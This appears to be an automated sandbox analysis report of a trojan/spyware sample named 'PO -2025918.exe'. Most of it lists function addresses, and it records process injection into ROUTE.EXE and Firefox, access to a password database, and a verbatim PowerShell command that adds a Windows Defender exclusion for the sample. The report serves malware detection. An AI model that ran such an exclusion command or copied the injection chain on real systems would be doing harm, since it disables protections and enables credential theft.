Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C541A2 4_2_01C541A2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C601AA 4_2_01C601AA
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C28158 4_2_01C28158
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90100 4_2_01B90100
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C603E6 4_2_01C603E6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A352 4_2_01C5A352
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C202C0 4_2_01C202C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C60591 4_2_01C60591
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4E4F6 4_2_01C4E4F6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C52446 4_2_01C52446
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44420 4_2_01C44420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9C7C0 4_2_01B9C7C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4750 4_2_01BC4750
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBC6E0 4_2_01BBC6E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6A9A6 4_2_01C6A9A6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B868B8 4_2_01B868B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE8F0 4_2_01BCE8F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAA840 4_2_01BAA840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA2840 4_2_01BA2840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C56BD7 4_2_01C56BD7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5AB40 4_2_01C5AB40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB8DBF 4_2_01BB8DBF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9ADE0 4_2_01B9ADE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAAD00 4_2_01BAAD00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3CD1F 4_2_01C3CD1F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90CF2 4_2_01B90CF2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40CB5 4_2_01C40CB5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0C00 4_2_01BA0C00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1EFA0 4_2_01C1EFA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92FC8 4_2_01B92FC8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C14F40 4_2_01C14F40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0F30 4_2_01BC0F30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE2F28 4_2_01BE2F28
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5EEDB 4_2_01C5EEDB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2E90 4_2_01BB2E90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5CE93 4_2_01C5CE93
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0E59 4_2_01BA0E59
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5EE26 4_2_01C5EE26
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAB1B0 4_2_01BAB1B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6B16B 4_2_01C6B16B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8F172 4_2_01B8F172
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD516C 4_2_01BD516C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4F0CC 4_2_01C4F0CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F0E0 4_2_01C5F0E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C570E9 4_2_01C570E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA70C0 4_2_01BA70C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE739A 4_2_01BE739A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5132D 4_2_01C5132D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8D34C 4_2_01B8D34C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA52A0 4_2_01BA52A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C412ED 4_2_01C412ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBD2F0 4_2_01BBD2F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBB2C0 4_2_01BBB2C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C695C3 4_2_01C695C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3D5B0 4_2_01C3D5B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57571 4_2_01C57571
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B91460 4_2_01B91460
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F43F 4_2_01C5F43F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F7B0 4_2_01C5F7B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C516CC 4_2_01C516CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE5630 4_2_01BE5630
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C35910 4_2_01C35910
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA9950 4_2_01BA9950
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBB950 4_2_01BBB950
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA38E0 4_2_01BA38E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0D800 4_2_01C0D800
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C15BF0 4_2_01C15BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBFB80 4_2_01BBFB80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BDDBF9 4_2_01BDDBF9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FB76 4_2_01C5FB76
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4DAC6 4_2_01C4DAC6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE5AA0 4_2_01BE5AA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C41AA3 4_2_01C41AA3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3DAAC 4_2_01C3DAAC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57A46 4_2_01C57A46
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FA49 4_2_01C5FA49
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C13A6C 4_2_01C13A6C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBFDC0 4_2_01BBFDC0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C51D5A 4_2_01C51D5A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57D73 4_2_01C57D73
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA3D40 4_2_01BA3D40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FCF2 4_2_01C5FCF2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C19C32 4_2_01C19C32
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA1F92 4_2_01BA1F92
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B63FD5 4_2_01B63FD5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B63FD2 4_2_01B63FD2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FFB1 4_2_01C5FFB1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FF09 4_2_01C5FF09
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA9EB0 4_2_01BA9EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338A352 9_2_0338A352
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DE3F0 9_2_032DE3F0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033903E6 9_2_033903E6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03370274 9_2_03370274
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033502C0 9_2_033502C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C0100 9_2_032C0100
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0336A118 9_2_0336A118
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03358158 9_2_03358158
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033901AA 9_2_033901AA
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033841A2 9_2_033841A2
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033881CC 9_2_033881CC
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03362000 9_2_03362000
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0770 9_2_032D0770
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032F4750 9_2_032F4750
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032CC7C0 9_2_032CC7C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EC6E0 9_2_032EC6E0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0535 9_2_032D0535
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03390591 9_2_03390591
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03374420 9_2_03374420
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03382446 9_2_03382446
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0337E4F6 9_2_0337E4F6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338AB40 9_2_0338AB40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03386BD7 9_2_03386BD7
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032CEA80 9_2_032CEA80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032E6962 9_2_032E6962
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D29A0 9_2_032D29A0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0339A9A6 9_2_0339A9A6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D2840 9_2_032D2840
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DA840 9_2_032DA840
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032B68B8 9_2_032B68B8
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032FE8F0 9_2_032FE8F0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03372F30 9_2_03372F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03312F28 9_2_03312F28
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032F0F30 9_2_032F0F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03344F40 9_2_03344F40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0334EFA0 9_2_0334EFA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C2FC8 9_2_032C2FC8
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338EE26 9_2_0338EE26
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0E59 9_2_032D0E59
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338CE93 9_2_0338CE93
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032E2E90 9_2_032E2E90
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338EEDB 9_2_0338EEDB
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0336CD1F 9_2_0336CD1F
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DAD00 9_2_032DAD00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032E8DBF 9_2_032E8DBF
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032CADE0 9_2_032CADE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0C00 9_2_032D0C00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03370CB5 9_2_03370CB5
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C0CF2 9_2_032C0CF2
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338132D 9_2_0338132D
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032BD34C 9_2_032BD34C
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0331739A 9_2_0331739A
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D52A0 9_2_032D52A0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033712ED 9_2_033712ED
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032ED2F0 9_2_032ED2F0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EB2C0 9_2_032EB2C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0339B16B 9_2_0339B16B
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032BF172 9_2_032BF172
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0330516C 9_2_0330516C
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DB1B0 9_2_032DB1B0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033870E9 9_2_033870E9
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338F0E0 9_2_0338F0E0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D70C0 9_2_032D70C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0337F0CC 9_2_0337F0CC
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338F7B0 9_2_0338F7B0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03315630 9_2_03315630
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033816CC 9_2_033816CC
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03387571 9_2_03387571
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0336D5B0 9_2_0336D5B0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033995C3 9_2_033995C3
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338F43F 9_2_0338F43F
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C1460 9_2_032C1460
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338FB76 9_2_0338FB76
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EFB80 9_2_032EFB80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03345BF0 9_2_03345BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0330DBF9 9_2_0330DBF9
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03343A6C 9_2_03343A6C
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338FA49 9_2_0338FA49
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03387A46 9_2_03387A46
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03315AA0 9_2_03315AA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03371AA3 9_2_03371AA3
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0336DAAC 9_2_0336DAAC
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0337DAC6 9_2_0337DAC6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03365910 9_2_03365910
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D9950 9_2_032D9950
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EB950 9_2_032EB950
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0333D800 9_2_0333D800
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D38E0 9_2_032D38E0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338FF09 9_2_0338FF09
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338FFB1 9_2_0338FFB1
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D1F92 9_2_032D1F92
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03293FD2 9_2_03293FD2
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03293FD5 9_2_03293FD5
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D9EB0 9_2_032D9EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03387D73 9_2_03387D73
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03381D5A 9_2_03381D5A
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D3D40 9_2_032D3D40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EFDC0 9_2_032EFDC0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03349C32 9_2_03349C32
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338FCF2 9_2_0338FCF2
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AA1D30 9_2_00AA1D30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9CBE7 9_2_00A9CBE7
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9CBF0 9_2_00A9CBF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9ADF0 9_2_00A9ADF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9CE10 9_2_00A9CE10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9AF34 9_2_00A9AF34
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00A9AF40 9_2_00A9AF40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AA53D0 9_2_00AA53D0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AA35E0 9_2_00AA35E0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AA35DD 9_2_00AA35DD
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00ABBAD0 9_2_00ABBAD0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_031AE333 9_2_031AE333
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_031AE216 9_2_031AE216
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_031AD798 9_2_031AD798
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_031AE6D5 9_2_031AE6D5
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_031ACA28 9_2_031ACA28
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01C1F290 appears 102 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01C0EA12 appears 86 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01BD5130 appears 58 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01B8B970 appears 262 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01BE7E54 appears 106 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 03305130 appears 58 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 032BB970 appears 262 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 0334F290 appears 103 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 03317E54 appears 107 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 0333EA12 appears 86 times
Sample file is different than original file name gathered from version info
Source: PO -2025918.exe, 00000000.00000002.1864286596.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1865271514.0000000002751000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1865271514.00000000027A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1894470547.000000000737C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1895191077.0000000008C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1892212304.0000000007040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000000.1692063844.0000000000450000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001C8D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
Source: PO -2025918.exe, 00000004.00000002.2124918917.000000000171A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameroute.exej% vs PO -2025918.exe
Source: PO -2025918.exe Binary or memory string: OriginalFilenameobgh.exe< vs PO -2025918.exe
Uses 32bit PE files
Source: PO -2025918.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO -2025918.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@11/8
Source: C:\Users\user\Desktop\PO -2025918.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO -2025918.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xct4qmlf.z35.ps1 Jump to behavior
Source: PO -2025918.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO -2025918.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PO -2025918.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2306045699.0000000002E88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO -2025918.exe Virustotal: Detection: 52%
Source: PO -2025918.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe" Jump to behavior
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: windows.storage.dll Jump to behavior
